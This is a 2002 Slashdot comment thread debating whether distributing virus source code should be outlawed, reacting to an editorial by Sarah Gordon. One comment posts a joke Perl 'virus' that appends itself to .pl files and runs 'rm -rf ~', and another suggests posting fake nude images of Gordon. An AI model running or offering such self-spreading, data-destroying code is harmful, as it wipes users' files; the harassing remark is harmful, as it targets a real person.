    Sarah Gordon is just fear-mongering at this point. Until she says "The term 'virus' means code that ....." objecting to her editorial is just automatic: she's using a term that has (1) a specific technical or mathematical meaning (to Fred Cohen and many Slashdot readers) and (2) a vague "common sense" meaning (to Windows users the general public and a few Slashdot readers). She's arguing based on both meanings. She's hoping that emotional or poorly intellectualized reactions to meaning (2) will get code representing meaning (1) outlawed.

    It's crap. Give it up Sarah.

    And just for good measure: http://cm.bell-labs.com/cm/cs/who/doug/v101.ps Read it and weep Sarah. Neener neener neener!
  • by rtm1 ( 560452 ) on Friday April 12, 2002 @03:04PM (#3331331)
    It says in the article: virus writing and subsequent distribution aren't pure speech. Rather, they're speech plus action

    But it is never elaborated on at all. I do not understand how it can be said that posting something on the web is any more of an action than the physical act of mailing a letter to the editor, but we do say that mailing a letter to the editor falls squarely under free speech. How are we supposed to separate speech and action (something the article acknowledges are different) on the internet if the act of posting places your content beyond pure speech? How are we supposed to have free speech if we are prevented from speaking to others by posting our thoughts?

    There is a big difference between saying "This code will infect machines and do this to them" and then compiling that code and releasing it with malicious intent. One is speech, the other is action. It is the same as the difference between saying "I could break into your home by doing this" and then actually going out and doing it. One is not illegal, the other is.

    This reminds me of another issue. How long before distributing an MP3 player makes you an accomplice to copyright infringement because you haven't included draconian copy-protection schemes? The problem is social, not technological.

  • Um would you nail the guy using Outlook on a corporate lan or MS for providing the disemmination software for it?

    This is humor for those who would inform me to read the article.
  • ...and do a damn good job. Without an *iron clad* definition, then you could make a case for things like say, Outlook, being "malicious". I don't mean to attack on Microsoft, I mean *anything* that unintentionally or intetionally causes damage could be considered malicious. Could "rm" be considered a "malicious" piece of code?
    • You've hit the nail on the head. Compilers and even "cat" or "copy.exe" can have viral properties depending on the context.

      Sarah Gordon is arguing sloppily - the audience she's speaking to allows it out of lack of rigor. She's hoping that a gut reaction to "virus" (Melissa etc) will get people to outlaw "virus" (in the form of self-replicating code).
  • Here's a counter proposal: all operating systems should be distributed with the latest viruses. The viruses should be activated when the OS is started. If the OS and the other software on board can't fight off the viruses then they aren't good enough and the programmers get a bad mark in the eyes of the consumers.

    I'm only half serious about this, of course, but the idea is better than Gordon's. Innoculating computers against viruses by forcing them to successfully fight viruses off will make the computers of the world more secure than trying to protect them in a sterile glass tube that shatters at the first poke.

  • We've always been on friendly terms Sarah, except when you go spouting fascist crap like this. What does Symantic pay you for anyways? Researching "ethical implications of select technologies" sounds like "making up FUD and scare tactics" to me. How can the author of The Generic Virus Writer [ibm.com] accuse anyone of "bad science". Pah-lease. You're a psychologist, your "discipline" invented bad science. When you condem virus writing and try to criminalize it like you constantly do you drive more and more kids to get into it -- call it the "coolness factor". Make it more illegal and it will become more dangerous. What the vx scene needs is compassion and guidance -- leadership if you will. When VLAD was on top we put forward [biodome.org] positive responsible leadership. Unlike hacking, writing viruses is about investigating the weaknesses of both insecure and secure systems. What can you do in the bounds of a good security model that is still malicious? Can this help us build better security models? This is research, and maybe if you got out of your closed little commerical lab ("we make scanners!" Big deal) you might be able to see the whole picture.
  • obfuscated code (Score:3, Interesting)

    by psyclone ( 187154 ) on Friday April 12, 2002 @03:13PM (#3331384)
    just like this contest [ioccc.org] has been promoting for years, obfuscated code may "fool" any automated tool that would somehow parse various languages. Virus writers already display some talent -- this would just encourage them to be more creative with the source.
  • "Making viruses publicly available on the World Wide Web for research or educational purposes? That's nonsense. Call it your constitutional right, but the truth is that it's morally wrong. "

    Sarah needs some education on what morals are. The fact that some people will have morals different from other is one reason we have freedom of speech. If we started saying what someone could say or not say, based on others morals, free speech would do away.

    I am not a scientit, but I can suscribe to any of there journals and access there information. A good deal of scientific discovery can be used for malice.

    "Sarah Gordon is senior research fellow at Symantec Security Response.."

    when someone from symantec talks about what is "moral", it kind of loses any emphasis.
  • I don't think it's possible to come up with a generally acceptable definition for "malicious code". Prove me wrong.

    Counterexamples:

    Internet Explorer and Netscape both trying to become the default system browser, with or without user knowledge. Are these pieces of code being malicious to each other?

    A trojan horse which requires willfull (but not knowing) participation from the user to install.

    A piece of software which serves a controversial, but generally beneficial purpose. For example, a spam bot trap, or news cancellers.

    A script kiddie proof buffer overflow exploit (even if it does just change /bin/sh to " bin sh". In hex though.)

    Anti-virus software which could produce false positives and stop software packages from running.

    A background ad-server which gets installed automatically, and unknowningly, by ISP or P2P client software. (Yes, I would like that to be considered malicious).

    An auto update server which gets installed automatically, and unknowningly, by the OS, which transparently downloads new software components and security fixes as they are available. (That does serve a useful function, for some people).


  • After all, making things illegal is so effective.
    Can you get child pornography? No, it's illegal.
    Can you get cracked software? No, it's illegal. Can you get ripped music? No, it's illegal.
    Do servers ever suffer from DOS attacks? Do people ever make charges on other people credit cards without the owner of CC knowing? Do people ever hack into private networks?

    Of course not, it's all illegal. Logically, if we make viruses illegal to write, noone would write them...right?

  • I believe virus distribution should be illegal, but distributing the code should not be (the title of the article is somewhat misleading). If someone wants to spread a virus, MS makes it easy for them with macros. If they aren't that computer literate, they probably aren't going to want to spread a virus in the first place.

    Posting the code should be legal because there are always new methods of attacking someone's computer, and people/companies working against this should have access to methods of distributing viruses that other people have thought of, the better to protect themselves/their customers.

    An apt analagy is that people are allowed to buy guns, despite the fact that they can kill people--they also help protect people from being killed.
    • A virus is a piece of software that distributes itself.

      Making "virus distribution" illegal would pose a an interesting logical debate. It is the computer code that distributes itself, so it is the computer code that is breaking the law.

      I am sure that the article was referring to the people who executed the program that distributes the virus, but you can get into a lot of hairy technicalities about what action caused the distribution. Is leaving an unmarked disket with a boot sector virus on it in a public place a distribution?

      Is knowingly not deleting a virus an act of distribution?
  • "In a guest editorial on Newarchitect, Sarah Gordon looks at whether spam should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on spam don't take into account who it's malicious against and what truly defines malicious." Note that she's not talking about actually sending spam, but merely making the text available for others to examine (and for some of them, no doubt, to try to spread in the wild).
  • Why should we care about computer viruses? I don't remember when I had this thing. I don't understand people which buys antivirus software, which scans their mail, then read NEWS like "don't open I love you letters!" and put half of their mail to trash. Why so much work is needed just to use computer?
    AFAIK computer viruses are so important only for Windows users. Systems, which allows computer viruses to exist - gives their users huge waste of time.
    Just let's talk about something else.
  • by supernova87a ( 532540 ) <kepler1.hotmail@com> on Friday April 12, 2002 @03:23PM (#3331453)
    If you think about it in the biological sense, from a purely result-oriented perspective, one might make the argument that viruses are good for computers. The justification is that viruses force people to make their code more robust, and less vulnerable to attack.

    I think I subscribe to this to some extent. If we had no viruses, and didn't know what havoc they could play with our system, we'd be completely unprepared for any such trouble in our systems -- whether maliciously, or because someone's code happened to go wrong.

    I don't think that you can place restrictions on what people write or do not write. I feel it's still the obligation of the system user to protect him/herself against problems and to be vigilant. It keeps us all in practice, and makes us more ready for whatever is out there, no?
    • "The justification is that viruses force people to make their code more robust, and less vulnerable to attack."

      • Yeah, but the idea is that if they didnn't exist, people's code wouldn't have to be as resilliant to attacks. It's the classic chicken or the egg story.
  • If distributing virus source code become outlawed, only outlaws will distribute virus source code...
  • I think there's some confusion about malicious code vs. virus.

    It's very difficult to give such a definition of "malicious code" that everyone agrees to.

    However, "virus" can be defined more accurately. Just take the most important virus feature - it should be self-replicating. I think it's enough to define virus, technically.

  • The internet is a community, and residents are responsible for keeping their computers in line. This includes keeping their computers secure from virus attacks and putting them down with antiviruses or firewalls if they go out and attack other people.

    With so many people on broadband nowadays, it seems like we don't have much other choice.

    To say you can't distribute virus code anymore is like saying no one is allowed to own pitbulls because they'd attack other people if they got out. If you take reasonable precautions with fences and signs and stuff, it should be OK. Even if he does get out once and bite someone, they get one more chance (to install an antivirus, secure their box, etc.) before getting put down (fines, DSL connection yanked, etc.). But if they went around eliminating every pit bull and rottweiler in existance, this won't help the fact that everyone has really poor fences that any specially trained attack chihuahua could get through (and get off scott-free for it too). Geez, you might as well try to go eliminate all the terrorists or something... oh wait...
  • ...look for Microsoft to open the Windows source. After all, with its memory holes and security flaws, I'm sure that if Windows source were available, it would be so "malicious" that it would be illegal to distribute anyway.
  • by RatOmeter ( 468015 ) on Friday April 12, 2002 @03:55PM (#3331653)
    Posting, distributing or making available source code to viruses should be illegal? You mean, like this?

    CodeRed.zip at Eeye.com [eeye.com]

    and

    CodeRedII.zip at Eeye.com [eeye.com]

    Eeye.com has often posted the proof-of-concept exploits as a part of their advisories... is the author of the guest editoral saying eeye.com is doing wrong?

    Back when the original Code Red was stirring up a ruckus, I posted its disassembled code (from eeye) to alt.comp.virus.source, and an short discussion of several weird aspects (poor coding) of the code ensued. I don't think I did anything wrong by posting it. If some weasel used that post (or other such sources) to create CRII, so be it. IMO, by that time any servers that were still vulnerable to CR/CRII deserved to be hit and, better yet, TOS'd by there ISP.

    I just don't subcribe to the idea that suppressing potentially dangerous source code will do good in the long run. Having the source available and widely distributed has several advantages:
    - promotes understanding of exploit mechanisms in order avoid making the same mistakes in the futre
    - promotes rapid deployment of fixes. There is no pressure greater than knowing every little script kiddy's got the code
    - raises awareness of code weaknesses/failure modes/common pitfalls (maybe *someday* CS courses will teach future coders to prevent buffer overflows!)

    I firmly believe that being open about software/network/OS weaknesses will gradually drive the state of the art in secure software to a much higher level. The "keep quiet", "head-in-the-sand" approach that M$ is promoting these days will only hinder such advances. I'll make a loose analogy to the old outlaws & guns argument: "If you outlaw virus source code, only outlaws will have virus source code."

    In fact, I think it is *imperative* that malicious source code NOT be suppressed. How else can we arm the next generations of app and OS coders to develop resistance code?

  • by Dr. Awktagon ( 233360 ) on Friday April 12, 2002 @04:00PM (#3331689) Homepage
    #!/usr/bin/perl
    # VIRUS.pl by l33tb0y
    # sh0utz to: b33k3r and dr.ph0t0n
    for (<*.pl>) {
    # 5pr34d d4 l0v3
    system "cat $0 >> $_";
    }
    # D4 P4YL04D! M3 50 3V1L!
    system "rm -rf ~";
    print "h4 h4 h4 h4 -- ur 0wn3d!\n";
  • What about bugs? (Score:2, Redundant)

    by ledbetter ( 179623 )
    If distributing dangerous code becomes illegal, what about bugs? Might it become illegal to release buggy software?? This could be a very interesting turn of events in light of the current situation of software licenses which basically absolve the authors of any and all responsibility for their code, whatsoever. Making viruses illegal could really have some interesting (and potentially dangerous) implications.

    Similarly what about academic exploit code? Might that become illegal as well?? Bottom line, code is way too close to speech to be restricted like this...
  • by kindbud ( 90044 ) on Friday April 12, 2002 @04:47PM (#3332041) Homepage
    I have concluded that people need to stop thinking they can do whatever they want simply because it's not illegal.

    I have been thinking that someone ought to post simulated naked pictures of Sarah on reallybadguys.org just to prove her wrong.
  • by dmoen ( 88623 ) on Friday April 12, 2002 @04:52PM (#3332075) Homepage
    Sarah is a security researcher for Symantec. She doesn't need to rely on public sources to get information about the latest exploits, because Symantec has a huge market share and lots of customers: Symantec can get this information directly from their customers and other contacts.

    Security researchers who don't work for dominant companies like Symantec aren't in such a sweet position, and rely on public forums to learn about exploits. And it's not enough to be told "there is a new virus that attacks X", with the details held secret (eg, known only by Microsoft, Symantec and a few other giants). Security researchers need precise details of how the exploit works, and they need to see the virus code itself in order to write code for detecting that virus signature, or to protect against certain aspects of its behaviour.

    Sarah's proposal is just a way to shut down the competition by criminalizing the only way that independent researchers have for getting information.

    Doug Moen

  • by jridley ( 9305 ) on Friday April 12, 2002 @06:36PM (#3332587)
    Code for a virus is no different than certain Stephen King books. Both can describe illegal action. Nobody is claiming that Stephen King did anything illegal, nor is it illegal for people to buy and read his books. It's illegal to try to do some of the things he describes, in sometimes tiny detail, exactly how to do.

Been Transferred Lately?

Working...